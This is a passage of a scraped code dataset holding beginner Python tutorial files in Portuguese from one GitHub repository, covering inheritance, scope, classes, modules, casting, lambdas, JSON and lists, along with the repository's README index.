"text": "'''\nPyhon Inheritance (Herança em Python)\n\nA herança nos permite definir uma classe que herda todos os métodos e propriedades de outra classe.\n\nClasse Pai é a classe que está sendo herdada, também chamada de classe Base.\n\nClasse Filha é a classe que herda de outra classe, também chamada de classe Derivada.\n'''\n# Criando uma classe Pai\n\n\nclass Pessoa:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n# Usamos a classe Pessoa para criar um objeto e em seguida executamos o método imprimeNome:\n\n\np1 = Pessoa('Robert', 'Souza')\np1.imprimeNome()\n\n'''\nChild Clas (Classe Filha)\n\nPara criarmos uma classe que herda a funcionalidade de outra classe, enviamos a classe Pai como parâmetro ao criar a classe Filha.\n'''\n# Exemlplo - Criação da classe Estudante que herdará as propriedades e os métodos da classe Pessoa:\n\n\nclass Pessoa2:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNomeCompleto(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante(Pessoa2):\n pass\n\n\ne1 = Estudante('Eric', 'Matthes')\ne1.imprimeNomeCompleto()\n\n'''\nAdd the __init__() Function\n\nAté o momento, criamos uma classe Filha que herda as propriedades e os métodos de sua classe Pai.\n\nVamos adicionar a função __init__() à classe Filha(em vez da palavra-chave pass).\n'''\n# OBS: A função __init__() é chamada automaticamente toda vez que a classe está sendo usada para criar um novo Objeto:\n\n\nclass Estudante2(Pessoa2):\n def __init__(self, nome, sobrenome):\n # add propriedades...\n\n # Quando Add a função __init__(), a classe Filha não herda mais a função __init__() da classe Pai:\n\n\nclass Pessoa3:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante3(Pessoa3):\n def __init__(self, nome, sobrenome):\n Pessoa3.__init__(self, nome, sobrenome)\n\n\np3 = Estudante3('Marijn', 'Haverbeke')\np3.imprimeNome()\n\n'''\nUso da super() Function\n\nPython também possui uma super() function que faz a classe Filha herdar todos os métodos e propriedades da classe Pai:\n'''\n# Exemplo:\n\n\nclass Pessoa4:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante4(Pessoa4):\n def __init__(self, nome, sobrenome):\n super().__init__(nome, sobrenome)\n\n\np4 = Estudante4('Robert', 'C. Martin')\np4.imprimeNome()\n\n# Obs: Ao usarmos a super() function, não precisamos usar o nome do elemento Pai, ele herdará automaticamente os métodos e propriedades da classe Pai.\n\n'''\nAdd Properties\n'''\n# Add uma propriedade 'anoGraduacao' à classe Estudante5:\n\n\nclass Pessoa5:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante5(Pessoa5):\n def __init__(self, nome, sobrenome):\n super().__init__(nome, sobrenome)\n self.anoGraduacao = 2020\n\n\np5 = Estudante5('Kent', 'Beck')\nprint(p5.anoGraduacao)\n\n'''\nNo exemplo abaixo o valor da propriedade'anoGraduacao' deve ser uma variável, passada para a classe 'Estudande6' ao criar objetos do 'Estudante6'.\nPara fazer isso, adicionamos o parâmetro na função __init__(). \n'''\n# Exemplo:\n\n\nclass Pessoa6:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante6(Pessoa6):\n def __init__(self, nome, sobrenome, ano):\n super().__init__(nome, sobrenome)\n self.anoGraduacao = ano\n\n\np6 = Estudante6('Guido', 'Van Rossum', 2021)\nprint(p6.anoGraduacao)\n\n'''\nAdd Methods\n'''\n# Add um método 'Bem vindo' a classe 'Estudante7':\n\n\nclass Pessoa7:\n def __init__(self, nome, sobrenome):\n self.nome = nome\n self.sobrenome = sobrenome\n\n def imprimeNome(self):\n print(self.nome, self.sobrenome)\n\n\nclass Estudante7(Pessoa7):\n def __init__(self, nome, sobrenome, ano):\n super().__init__(nome, sobrenome)\n self.anoGraduacao = ano\n\n def BemVindo(self):\n print('Bem vindo', self.nome, self.sobrenome,\n 'ao ano de', self.anoGraduacao)\n\n\np7 = Estudante7('Guido', 'Van', 2021)\np7.BemVindo()\n\n# Obs: Se adicionarmos um método na classe Filha com o mesmo nome de um método da classe Pai, o método da classe Filha sobrescrevera o método da classe Pai.\n"
},
{
"alpha_fraction": 0.7535328269004822,
"alphanum_fraction": 0.7763923406600952,
"avg_line_length": 67.74285888671875,
"blob_id": "60bc0505abc2dc5fa472339813e35627da281606",
"content_id": "5c39c38539b486ac036a7cfb95ff71300d2ee75d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2408,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 35,
"path": "/README.md",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "# Python Beginner\n\n\n\n## Indice\n\n* [Sintax](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Comments](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Variables](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Data Types](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Numbers](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Casting](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Strings](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-1)\n* [Booleans](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Operators](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Lists](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Tuples](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Sets](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [Dictionaries](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [If...Else](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-2)\n* [While Loops](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [For Loops](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Functions](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Lambda](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Arrays](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Classes/Objects](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Inheritance](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-3)\n* [Iterators](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Scope](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Modules](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Dates](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [Math](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n* [JSON](https://github.com/rogerio5ouza/python-beginner/tree/master/semana-4)\n\n_Fontes:_ python.org e w3schools.com (com adaptações).\n"
},
{
"alpha_fraction": 0.7316486239433289,
"alphanum_fraction": 0.7316486239433289,
"avg_line_length": 20.86842155456543,
"blob_id": "1eca8494f452f4b6888afe0e1847030014c843ff",
"content_id": "644ac5c7fb2b13be78ccb49cf321238e22325abc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 38,
"path": "/semana-1/comments.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nComentários em Python\n\nComentários podem ser usados para explicar o código Python.\nOs comentários podem ser usados para tornar o código mais legível.\nOs comentários podem ser usados para impedir a execução ao testar o código.\nOs comentários começam com um # e o Python os ignorará:\n'''\n# Exemplo:\n\n# Isso é um comentário de uma linha\nprint('Hello, World!')\n\n'''\nOs comentários podem ser colocados no final de uma linha, e o Python ignorará o restante da linha:\n'''\nprint('Hello, World!') # Isso é um comentário\n\n'''\nOs comentários não precisam ser texto para explicar o código, também podem ser usados para impedir \nque o Python execute o código:\n'''\n\n# print('Hello, World!')\nprint('Olá, amigo!')\n\n'''\nComentários de múltiplas linhas:\n'''\n\n\"\"\"\n\nThis is a comment\nwritten is\nmore than just one line\n\"\"\"\n\nprint('Hello, World!')\n"
},
{
"alpha_fraction": 0.7042186260223389,
"alphanum_fraction": 0.7205177545547485,
"avg_line_length": 18.14678955078125,
"blob_id": "133053645c39f4069078c53f42074aa23eaf9d23",
"content_id": "51ba67b7b240636aa6fdc0e528b984f01d71c26d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2166,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 109,
"path": "/semana-4/scope.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Scope\n\nUma variável está disponível apenas dentro da área em que foi criada. Isso é chamado de Escopo.\n\nEscopo Local\n\nUma variável criada dentro de uma função pertence ao escopo local dessa função e só pode ser usada dentro dessa função.\n'''\n# Exemplo\n# Uma variável criada dentro de uma função está disponível apenas dentro dessa função:\n\n\ndef minha_função():\n x = 100\n print(x)\n\n\nminha_função()\n\n'''\nFunction Inside Function\n\nConforme visto acima, a variável x não está disponível fora da função, mas está disponível para qualquer função dentro da função.\n'''\n# Exemplo\n# A variável local pode ser acessada de uma função dentro da função:\n\n\ndef minha_funcao_2():\n x = 200\n\n def minha_funcao_interna():\n print(x)\n minha_funcao_interna()\n\n\nminha_funcao_2()\n\n'''\nGlobal Scope\n\nUma variável criada no corpo principal do código Python é uma variável global e pertence ao escopo global.\n\nVariáveis globais estão disponíveis em qualquer escopo, global e local.\n'''\n# Exemplo\n# Uma variável criada fora de uma função é global e pode ser usada por qualquer pessoa:\n\nx = 300\n\n\ndef minha_funcao_3():\n print(x)\n\n\nminha_funcao_3()\n\nprint(x)\n\n'''\nNaming Variables\n\nSe nós operarmos com o mesmo nome de variável dentro e fora de uma função, p Python as trarará como duas variáveis separadas,\numa dispinível no escopo global (fora da função) e outra disponível no escopo local (dentro da função).\n'''\n# Exemplo\n# A função imprimirá o x local e,em seguida, o código imprimirá o x global:\n\nx = 200\n\n\ndef minha_funcao_4():\n x = 300\n print(x)\n\n\nminha_funcao_4()\nprint(x)\n\n'''\nGlobal Keyword\n\nSe precisármos criar uma variável global mas, estivérmos presos no escopo local, podemos usar a Global Keyword.\nA Global Keyword torna a variável global.\n'''\n# Exemplo:\n\ndef minha_funcao_5():\n global x\n x = 200\n print(x)\n\nminha_funcao_5()\n\nprint(x)\n\n# Além disso, usamos a Global Keyword se quisérmos fazer uma alteração em uma variável global dentro da função.\n# Exemplo:\n\nx = 400\n\ndef minha_funcao_6():\n global x\n x = 500 \n\nminha_funcao_6()\n\nprint(x)"
},
{
"alpha_fraction": 0.6479970216751099,
"alphanum_fraction": 0.6665430068969727,
"avg_line_length": 18.39568328857422,
"blob_id": "9d2aa5e620f25c0b5dac149423971c787df585d5",
"content_id": "3b118ddd565e7678c14dbac63d00ae895aed0978",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2744,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 139,
"path": "/semana-3/classes_objects.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nClasses and Objects (Classes e Objetos)\n\nQuase tudo no Python é um objeto, com suas propriedades e métodos.\nUma classe é como um construtor de objetos ou um modelo para criar objetos.\n'''\n# Exemplo:\n\n\nclass MinhaClasseNome:\n nome = 'roger'\n\n\nprint(MinhaClasseNome)\n\n# Criação do objeto nome1 e impressão do valor nome:\n\nnome1 = MinhaClasseNome()\nprint(nome1.nome)\n\n'''\nThe __init__() Function \n\nPara entender o significado das classes, precisamos entender a função interna __init__().\n\nTodas as classes têm uma função chamada __init__(), que é sempre executada quando a classe está sendo iniciada.\n\nUsamos a função __init__() para atribuir valores às propriedades do objeto ou outras operações necessárias quando o objeto estiver sendo criado.\n'''\n# Exemplo:\n\n\nclass Pessoa:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n\np1 = Pessoa('Robert', 32)\n\nprint(p1.nome)\nprint(p1.idade)\n\n'''\nObject Methods (Métodos de objeto)\n\nObjetos também podem conter métodos. Métodos em objetos são funções que pertencem ao objeto.\n\n'''\n# Exemplo:\n\n\nclass Pessoa2:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc2(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np2 = Pessoa2('Roger', 32)\np2.minhaFunc2()\n\n'''\nThe self Parameter (O Parâmetro self)\n\nO parâmetro self é uma referencia a instância atual da classe e é usado para acessar variáveis que pertencem à classe.\n\nEle não precisa ser nomeado como self, podemos chamá-lo como quisermos, mas dever ser o primeiro parâmetro de qualquer função da classe.\n'''\n# Exemplo:\n\n\nclass Pessoa3:\n def __init__(meuparametro, nome, idade):\n meuparametro.nome = nome\n meuparametro.idade = idade\n\n def minhaFunc3(abc):\n print('Olá, meu nome é: ' + abc.nome)\n\n\np3 = Pessoa3('Roger', 32)\np3.minhaFunc3()\n\n# Modificando propriedades do objeto:\n\n\nclass Pessoa4:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc4(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np4 = Pessoa4('Rogerio', 32)\n\np4.idade = 40\n\nprint(p4.idade)\n\n# Deletando propriedades de um objeto com del:\n\n\nclass Pessoa5:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc5(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np5 = Pessoa5('Richard', 50)\n\ndel p5.idade\n\nprint(p5.idade)\n\n# Deletando objetos com del:\n\n\nclass Pessoa6:\n def __init__(self, nome, idade):\n self.nome = nome\n self.idade = idade\n\n def minhaFunc6(self):\n print('Olá, meu nome é: ' + self.nome)\n\n\np6 = Pessoa6('Richard', 50)\n\ndel p6\n\nprint(p6)\n"
},
{
"alpha_fraction": 0.7192118167877197,
"alphanum_fraction": 0.7241379022598267,
"avg_line_length": 14.615385055541992,
"blob_id": "6ccd534b0ab36075f6bf7cc8f955f7440a58d003",
"content_id": "63b28c82363a7ad02e4559aa4d7571d4a7993a42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 13,
"path": "/semana-4/modules_2.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nUso do Módulo\n\nPodemos usar o módulo que acabamos de criar, usando a instrução import.\n'''\n# Exemplo:\n\nimport modules\n\nmodules.boas_vindas('Rogerio!')\n\nidade = modules.pessoa_1[\"idade\"]\nprint(idade)\n"
},
{
"alpha_fraction": 0.6493030190467834,
"alphanum_fraction": 0.6705796122550964,
"avg_line_length": 24.240739822387695,
"blob_id": "2f3cbceb323336e281daf89e0ed399718640f1b3",
"content_id": "73bfbd6365ee165b720eb58ffcb2373198f3fca0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1389,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 54,
"path": "/semana-1/casting.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Casting (Fusão)\n\nEspecifica um tipo de variável\n\nPode haver momentos em que você queira especificar um tipo para uma variável. Isso pode ser feito com Casting.\nPython é uma linguagem orientada a objetos e, como tal, usa classes para definir tipos de dados, incluindo seus \ntipos primitivos.\n\nCasting em Python é, portanto, feita usando funções de construtor:\n\nint() - constrói um número inteiro a partir de um literal int, um literal float (arredondando para baixo para o número\n int anterior) ou um literal string (desde que a string represente um número int).\n\nfloat() - constrói um número float a partir de um literal int, um float literal ou um string literal (desde que a string\n represente um número inteiro ou flutuante).\n\nstr() - constrói uma string a partir de um ampla variedade de tipos de dados, incluindo strings, literais inteiros e literais float.\n'''\n\n# Exemplos\n\n# Integers:\n\nx = int(1) # x será 1\ny = int(2.8) # y será 2\nz = int('3') # z será 3\n\nprint (x)\nprint (y)\nprint (type(z))\n\n\n# Floats:\n\nx = float(1) # x será 1.0\ny = float(2.8) # y será 2.8\nz = float('3') # z será 3.0\nw = float('4.2') # w será 4.2\n\nprint (x)\nprint (y)\nprint (z)\nprint (type(w))\n\n# Strings\n\nx = str('s1') # x será 's1'\ny = str(2) # y será '2'\nz = str(3.0) # z será '3.0'\n\nprint (x)\nprint (y)\nprint (type(z))\n"
},
{
"alpha_fraction": 0.7227723002433777,
"alphanum_fraction": 0.7349581122398376,
"avg_line_length": 23.314815521240234,
"blob_id": "9b2356ccdf0fb90f0bdf1b9866f574dad5178c36",
"content_id": "77ca0ff086de2ea5a8745c6c0f7aee951304e4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1362,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 54,
"path": "/semana-3/lambda.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nLambda Function (Função Lambda)\n\nUma função Lambda é uma pequena função anônima.\nUma função Lambda pode receber qualquer número de argumentos, mas pode ter apenas uma expressão.\n'''\n# Exemplo - Uma função lambda que adiciona 10 ao número passado como argumento e imprime o resultado:\n\n\ndef x(numero_x): return numero_x + 10\n\n\nprint(x(5))\n\n'''\nAs funções Lambdas podem receber qualquer número de argumentos.\n'''\n# Exemplo - Uma função lambda que multiplica o parâmetro passado A pelo parâmetro B e imprime o resultado:\n\n\ndef y(a, b): return a * b\n\n\nprint(y(10, 5))\n\n# Exemplo - Uma função lambda que soma os parâmetros A, B, e C e imprime o resultado:\n\n\ndef z(a, b, c): return a + b + c\n\n\nprint(z(2, 3, 5))\n\n'''\nPor que usar funções Lambda?\n\nO poder do Lambda é mostrado melhor quando a usamos como uma função anônima dentro de outra função.\nDigamos que temos uma definição de função que aceite um parâmetro e esse parâmetro será multiplicado por um número desconhecido.\n'''\n# Exemplo:\n\n\ndef minha_funcao_anonima(n):\n return lambda numero_x: numero_x * n\n\n# Usamos essa definição de função para criar uma função que sempre dobre o número que enviamos por parâmetro:\n\n\ndef minha_funcao_anonima_2(n):\n return lambda numero_x: numero_x * n\n\n\nmeu_dobrador = minha_funcao_anonima_2(2)\nprint(meu_dobrador(10))\n"
},
{
"alpha_fraction": 0.6954887509346008,
"alphanum_fraction": 0.7005012631416321,
"avg_line_length": 20,
"blob_id": "1185df35da3058370f016b77a5bf23247853a4fc",
"content_id": "bbe91d3b13a0131b8b601bcacc376ce175b18c54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 805,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 38,
"path": "/semana-4/convert_json_to_python.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "import json\n\n'''\nPython JSON\n\nJSON é uma sintaxe para armazenamento e troca de dados.\n\nJSON é um texto escrito com notação de objeto JavaScript.\n\nPython tem um pacote integrado chamado json, que pode ser usado para trabalhar com dados JSON.\n'''\n# Exemplo\n# Importa o módulo json:\n\n# import json\n\n'''\nParse JSON - Converte de JSON para Python\n\nSe tivermos uma string JSON, podemos analisá-la usando o método json.loads(). \n'''\n# Exemplo\n# Converte de JSON para Python:\n\n# JSON:\n\nstring_json = '{\"nome\":\"John\", \"idade\":32, \"cidade\":\"Salvador-BA\"}'\n# x = '{ \"nome\":\"John\", \"idade\":30, \"cidade\":\"Salvador-BA\"}'\n\n# parse string_json:\n\nparse_json_para_python = json.loads(string_json)\n# y = json.loads(x)\n\n# o resultado e um dicionario Python:\n\nprint(parse_json_para_python[\"idade\"])\n# print(y[\"idade\"])\n"
},
{
"alpha_fraction": 0.7862903475761414,
"alphanum_fraction": 0.7862903475761414,
"avg_line_length": 19.66666603088379,
"blob_id": "0a6b45f11890eaee194e76897d247af5db93128d",
"content_id": "cd27470b272154a4ec2a1749fcaab59051fbbec7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 12,
"path": "/semana-4/modules_4.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nMódulos Integrados\n\nExistem vários módulos embutidos no Python, que podemos importar quando quisermos.\n'''\n# Exemplo\n# Importar e usar o módulo da plataforma:\n\nimport platform\n\nsistema_operacional = platform.system()\nprint(sistema_operacional)\n"
},
{
"alpha_fraction": 0.6403785347938538,
"alphanum_fraction": 0.6498422622680664,
"avg_line_length": 16.61111068725586,
"blob_id": "1e69df9b61c364a8b4a4f444a0e434e98a243ef8",
"content_id": "1dfa05ecd3cc83d022fe001008f0867c664485b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 18,
"path": "/semana-4/modules_6.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nImportar do Módulo\n\nPodemos escolher importar apenas partes de um Módulo, usando a keyword from.\n'''\n# Exemplo\n# O Módulo denominado 'modules' possui uma função e um dicionário:\n\n\ndef boas_vindas(nome):\n print('Olá, ' + nome)\n\n\npessoa_1 = {\n 'nome': 'Rogerio',\n 'idade': '32',\n 'cidade': 'Brasilia'\n}\n"
},
{
"alpha_fraction": 0.7075985074043274,
"alphanum_fraction": 0.7155101299285889,
"avg_line_length": 28.886699676513672,
"blob_id": "e7fefa8a79f78534c34178301ed4ba653c86ccee",
"content_id": "e46de1d9304e19dcf1daaaeb2c9ebf8dfbf530cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6171,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 203,
"path": "/semana-2/lists.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPYTHON LISTS\nPYTHON COLLECTIONS (Arrays)\n\nExistem quatro tipos de coleção de dados na linguagem de programação Python:\n\n- List (lista) é uma coleção que é ordenada e mutável. Permite membros duplicados.\n- Tuple (tupla) é uma coleção ordenada e imutável. Permite membros duplicados.\n- Set (conjunto) é uma coleção não ordenada e não indexada. Nenhum membro duplicado.\n- Dictionary (dicionário) é uma coleção desordenda, mutável e indexada. Nenhum membro duplicado.\n\nAo escolher um tipo de coleção, é útil entender as propriedades desse tipo. Escolher o tipo certo\npara um conjunto de dados específico pode significar retenção de significado e, também, aumento de eficiência ou segurança.\n'''\n\n# List\nthislist = ['apple', 'banana', 'cherry']\n\nprint(thislist)\n\n# Itens de acesso - podemos acessar os itens da lista consultando o número do índice:\nthislist = ['apple', 'banana', 'cherry']\n\nprint(thislist[1])\n\n# Indexação negativa (Negative Indexing)- significa que começa no final, -1 refere-se ao último item, -2 refere-se ao segundo último item etc...\nthislist = ['apple', 'banana', 'cherry']\n\nprint(thislist[-1])\n\n# Intervalo de índices (Range of Indexes) - podemos especificar um intervalo de índices especificando por onde começar e por onde terminar o intervalo.\n# Ao especificar um intervalo, o valor retornado será uma nova lista com os itens especificados.\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[2:5])\n\n# Deixando de fora o valor inicial, o intervalo comecará no primeiro item:\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[:4])\n\n# Deixando de fora o valor final, o intervalo continuará no final da lista:\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[2:])\n\n# Intervalo de índices negativos (Range of Negative Indexes) - para especificar índices negativos do final da lista:\nthislist = ['apple', 'banana', 'cherry', 'orange', 'kiwi', 'melon', 'mango']\n\nprint(thislist[-4:-1])\n\n# Intervalo de índices negativos (Range of Negative Indices)\n# Muda o segundo item:\n\nthislist = ['apple', 'banana', 'cherry']\nthislist[1] = 'blackcurrant'\nprint(thislist)\n\n# Loop através de uma lista\n# Podemos percorrer os itens de uma lista usando loop for:\n\nthislist = ['apple', 'banana', 'cherry', 'melon']\nfor x in thislist:\n print(x)\n\n\n# Verifica se o item existe (Check if Item Exists)\n# Para determinar se um item específico está presente em uma lista, usamos a palavra-chave IN:\n\nthislist = ['apple', 'banana', 'cherry']\nif 'apple' in thislist:\n print(\"Yes, 'apple' is in the list\")\n\n# Comprimento da lista (List Length)\n# Para determinar quantos itens uma lista possui, usamosa a função len():\n\nthislist = ['apple', 'banana', 'cherry']\nprint(len(thislist))\n\n# Adicionar itens (Add Items)\n# Para adicionar um item ao final da lista, usamos o método APPEND():\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.append('orange')\nprint(thislist)\n\n# Para adicionar um item ao índice especificado, usamos o método INSERT():\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.insert(1, 'orange')\nprint(thislist)\n\n# Remover item (Remove Item)\n# Existem vários métodos para remover itens de uma lista:\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.remove('banana')\nprint(thislist)\n\n# O método pop() remove um índice específico (ou o último item se o índice não for especificado):\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.pop()\nprint(thislist)\n\n# A palavra chave DEL remove um índice específico:\n\nthislist = ['apple', 'banana', 'cherry']\ndel thislist[0]\nprint(thislist)\n\n# A palavra chave DEL também pode deletar uma lista completa:\n\nthislist = ['apple', 'banana', 'cherry']\ndel thislist\n\n# O método clear() esvazia uma lista:\n\nthislist = ['apple', 'banana', 'cherry']\nthislist.clear()\nprint(thislist)\n\n'''\nCOPIAR UMA LISTA (Copy a List)\n\nNão podemos copiar uma lista simplesmente digitando list2 = list1, porque: list2 será apenas uma referência à list1 e as alterações feitas em list1 \ntambém serão automaticamente feitas em list2.\n\nExistem maneiras de se fazer uma cópia, e uma maneira é por meio do método de lista embutido copy().\n'''\n# Exemplo:\n\nthislist = ['apple', 'banana', 'cherry']\nmylist = thislist.copy()\nprint(mylist)\n\n# Outra maneira de se fazer uma cópia, é usando o método de lista embutido list():\n\nthislist = ['apple', 'banana', 'cherry']\nmylist = list(thislist)\nprint(mylist)\n\n'''\nUNINDO DUAS LISTAS (Join Two Lists)\n\nExistem várias maneiras de inserir ou concatenar duas ou mais listas.\nUma maneira fácil é fazendo uso do operador +.\n'''\n\n# Exemplo:\n\nlist1 = ['a', 'b', 'c']\nlist2 = [1, 2, 3]\n\nlist3 = list1 + list2\nprint(list3)\n\n# Outro maneira de unir listas é anexando(appending) todos os itens da list2 na list1, um por um:\n\nlist1 = ['a', 'b', 'c']\nlist2 = [1, 2, 3]\n\nfor x in list2:\n list1.append(x)\n\nprint(list1)\n\n# Ou ainda podemos usar o método extend(), cujo objetivo é adicionar elementos de uma lista para outra lista (o método extend() adiciona a list2 no final da list1):\n\nlist1 = ['a', 'b', 'c']\nlist2 = [1, 2, 3]\n\nlist1.extend(list2)\nprint(list1)\n\n'''\nCONSTRUTOR list() - The list() Constructor\n\nÉ possível usar o construtor list() para fazer uma nova lista.\n'''\n# Exemplo:\n\nthislist = list(('apple', 'banana', 'cherry'))\nprint(thislist)\n\n'''\nLISTA DE MÉTODOS (List Methods)\n\nPython possui um conjunto de métodos nativos que pode ser usado em listas:\n\n- append() -> Adiciona um elemento no final de uma lista.\n- clear() -> Remove todos os elementos da lista.\n- copy() -> Retorna uma cópia da lista.\n- count() -> Retorna o número de elementos com o específico valor.\n- extend() -> Adiciona elementos de uma lista para o final da lista.\n- index() -> Retorna o índice do primeiro elemento com o valor especificado.\n- insert() -> Adiciona um elemento em uma posição específica da lista.\n- pop() -> Remove o elemento da posição especificada.\n- remove() -> Remove o item com um valor específico.\n- reverse()-> Reverte a ordem da lista.\n- sort() -> Ordena a lista.\n\n'''\n"
},
{
"alpha_fraction": 0.5614035129547119,
"alphanum_fraction": 0.5760233998298645,
"avg_line_length": 17.486486434936523,
"blob_id": "ce1504e0246cda93a785f37ba5ea93fdbe4a0d67",
"content_id": "3c1d1eb285bd4919b0f8974612745f55a67eafe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 686,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 37,
"path": "/semana-4/convert_python_objects_1.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "import json\n\n'''\nQuando convertemos de Python para JSON, os objetos Python são convertidos\nao equivalente no JSON (JavaScript):\n\nPYTHON JSON\n\ndict -> Object\nlist -> Array\ntuple -> Array\nstr -> String\nint -> Number\nfloat -> Number\nTrue -> true\nFalse -> false\nNone -> null\n\n'''\n\n# Exemplo\n# Conversão de um objeto Python contendo todos os tipos de dados legais:\n\nx = {\n \"nome\": \"John\",\n \"idade\": 30,\n \"casado\": True,\n \"divorciado\": False,\n \"criancas\": (\"Ana\", \"Billy\"),\n \"pets\": None,\n \"carros\": [\n {\"modelo\": \"Volkswagen Gol\", \"ano\": 2020},\n {\"modelo\": \"Ford Focus\", \"ano\": 2019}\n ]\n}\n\nprint(json.dumps(x))\n"
},
{
"alpha_fraction": 0.6556603908538818,
"alphanum_fraction": 0.6745283007621765,
"avg_line_length": 15.960000038146973,
"blob_id": "f17de127450b8faa07538607716c66dc45ad1d60",
